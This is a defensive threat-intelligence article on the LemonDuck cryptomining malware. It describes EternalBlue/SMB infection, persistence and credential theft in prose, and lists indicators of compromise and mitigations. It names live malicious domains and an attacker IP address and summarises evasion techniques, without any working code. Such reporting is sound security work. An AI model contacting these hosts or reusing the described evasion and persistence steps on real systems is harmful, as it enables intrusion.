LemonDuck Malware: Exploiting SMB Vulnerabilities for Cryptomining

Introduction

LemonDuck is a sophisticated piece of malware known for its ability to exploit vulnerabilities in Windows systems, particularly through the Server Message Block (SMB) protocol. This malware leverages the EternalBlue vulnerability (CVE-2017-0144) to infect servers, disable security systems, and convert compromised devices into cryptomining machines. Despite the availability of patches for EternalBlue, many systems remain vulnerable due to outdated software and misconfigured security protocols.

How LemonDuck Operates

LemonDuck initiates its attack by exploiting weak SMB services, specifically targeting the EternalBlue vulnerability, which allows unauthorized access to system resources. Here’s a breakdown of its infection process:

1. Infiltration via SMB and Brute-Force Attacks
   LemonDuck malware first gains access through vulnerable SMB protocols or by brute-forcing administrator credentials. Once inside, it creates hidden administrative folders and runs malicious scripts like p.bat. This script manipulates firewall settings, opens TCP ports, and sets up port forwarding, allowing the malware to hide its outbound traffic under the guise of DNS queries.
2. Malware Persistence and Stealth
   After gaining access, LemonDuck employs several techniques to evade detection. It creates an executable disguised as the legitimate svchost.exe, disables Windows Defender, and excludes critical system directories from antivirus scans. It also uses PowerShell to download additional malicious files, ensuring the malware's continued presence on the system.
3. Scheduled Tasks for Sustained Attacks
   LemonDuck creates scheduled tasks that execute malicious scripts every 50 minutes, ensuring that the malware continues to run even after system reboots. If PowerShell is unavailable, the malware uses alternative methods like mshta to schedule tasks and ensure persistence.

Advanced Techniques

LemonDuck uses several advanced tactics to maintain control and hinder detection:

• PowerShell Manipulation: LemonDuck downloads additional malicious scripts via PowerShell, creating new tasks in the system scheduler. If PowerShell is absent, it manipulates the scheduler to replace existing tasks with its own malicious versions.
• Credential Theft and Lateral Movement: Once inside, the malware uses tools like Mimikatz to steal credentials and spread across the network. It then leverages these stolen credentials to gain higher privileges and access more sensitive parts of the system.
• Blocking Other Threat Actors: LemonDuck doesn’t just focus on system resources; it actively seeks to block other malware from infecting the same system by deleting previously created administrative shares.

Indicators of Compromise (IoCs)

Organizations can detect LemonDuck by monitoring for specific indicators, including:

• File Hashes:
• msInstall.exe (MD5: 3ca77a9dfa6188ed9418d03df61fea7a)
• Malicious Domains:
• t.amynx.com
• w.zz3r0.com
• IP Addresses:
• 211.22.131.99 (Taichung, Taiwan)
• Tactics, Techniques, and Procedures (TTPs):
• Public-Facing Application Exploitation
• PowerShell and Command Shell exploitation
• Creation of scheduled tasks to ensure persistence
• Disabling system defenses such as Windows Firewall

Prevention and Mitigation

To defend against LemonDuck and similar malware, organizations should take the following steps:

1. Patch Management
   Ensure all systems are up-to-date with the latest security patches, particularly those addressing SMB vulnerabilities like EternalBlue (CVE-2017-0144).
2. Network Segmentation
   Segment network resources to limit lateral movement within the organization. Ensure that only necessary services are accessible through SMB.
3. Credential Hygiene
   Enforce strong password policies to prevent brute-force attacks. Regularly rotate credentials, particularly for administrator accounts.
4. Monitoring and Detection
   Deploy advanced monitoring tools to detect suspicious behavior, such as unusual traffic patterns or unexpected scheduled tasks. Monitor for IoCs associated with LemonDuck.
5. Disable PowerShell Where Not Needed
   Restrict the use of PowerShell in environments where it is not necessary. If possible, monitor its usage closely to prevent unauthorized scripts from executing.

Conclusion

LemonDuck is a persistent threat, targeting vulnerable Windows servers through SMB exploits and brute-force attacks. Its advanced evasion techniques, combined with the ability to disable security measures and steal credentials, make it a potent tool for cryptomining. Organizations must take proactive steps to patch vulnerabilities, monitor for signs of infection, and implement strict security protocols to mitigate the risks posed by this dangerous malware.